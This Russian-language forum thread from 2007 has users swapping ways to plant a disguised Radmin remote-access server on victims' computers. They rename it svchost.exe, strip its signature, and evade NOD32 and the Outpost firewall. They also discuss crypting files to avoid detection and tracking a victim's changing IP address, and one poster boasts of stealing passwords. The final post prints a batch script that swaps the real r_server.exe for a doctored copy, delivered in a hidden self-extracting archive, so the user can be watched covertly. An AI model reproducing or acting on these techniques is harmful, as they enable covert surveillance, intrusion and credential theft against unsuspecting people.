Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

16.03.2007, 22:08
|
|
Новичок
Регистрация: 09.03.2007
Сообщений: 11
Провел на форуме: 12956
Репутация:
0
|
|
Все я сам разобрался и с портом как менять и паролем !)
|
|
|

23.03.2007, 14:27
|
|
Новичок
Регистрация: 22.03.2007
Сообщений: 3
Провел на форуме: 22030
Репутация:
0
|
|
Тема супер!
-И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ...
-Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ...
svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... )
set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки 
raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator)
AdmDll.dll
-Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ...
-Есть одна только проблема:
Виндовозовский брадмауер, чётко обошли ...
А как быть с OutPost-ом
Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ...
Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg
-OutPost не принимает его в исключения (разрешённые программы)
-Может есть у кого, какие соображения на данную тему?
|
|
|

26.03.2007, 18:14
|
|
Новичок
Регистрация: 25.12.2006
Сообщений: 14
Провел на форуме: 239355
Репутация:
1
|
|
Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )
|
|
|

27.03.2007, 05:24
|
|
Новичок
Регистрация: 04.08.2006
Сообщений: 15
Провел на форуме: 65556
Репутация:
0
|
|
Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться  .
|
|
|

27.03.2007, 06:33
|
|
Новичок
Регистрация: 22.03.2007
Сообщений: 3
Провел на форуме: 22030
Репутация:
0
|
|
Сообщение от P-29
Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться  .
Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)
- Чтож за NOD у тебя такой?
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит .... 
|
|
|

29.03.2007, 18:28
|
|
Новичок
Регистрация: 09.03.2007
Сообщений: 11
Провел на форуме: 12956
Репутация:
0
|
|
У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха
Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !
|
|
|

03.04.2007, 00:10
|
|
Новичок
Регистрация: 28.02.2007
Сообщений: 21
Провел на форуме: 681686
Репутация:
8
|
|
Проблема....
У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес 
Последний раз редактировалось BrutAino; 03.04.2007 в 00:17..
|
|
|

03.04.2007, 00:34
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме: 7134052
Репутация:
1204
|
|
У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес
установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)
|
|
|

10.04.2007, 23:07
|
|
Новичок
Регистрация: 04.08.2006
Сообщений: 15
Провел на форуме: 65556
Репутация:
0
|
|
Сообщение от Prodi
Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-)
- Чтож за NOD у тебя такой?
У меня NOD32 c версией баз 2144 от 25 марта и них... не палит .... 
У меня с версий 2176 и палит без в сякого глубокава анализа, ранше да тока с глубоким палил.
|
|
|

02.05.2007, 19:24
|
|
Познающий
Регистрация: 10.12.2006
Сообщений: 40
Провел на форуме: 813492
Репутация:
21
|
|
Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили.
Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так:
taskkill /im r_server.exe /f
del C:\WINDOWS\system32\r_server.exe
.
.
{эту строку я продублировал 100 раз}
.
.
del C:\WINDOWS\system32\r_server.exe
copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe"
"%SYSTEMROOT%\system32\r_server.exe" /start
del C:\r_server.exe
del C:\start.bat
Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы.
Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|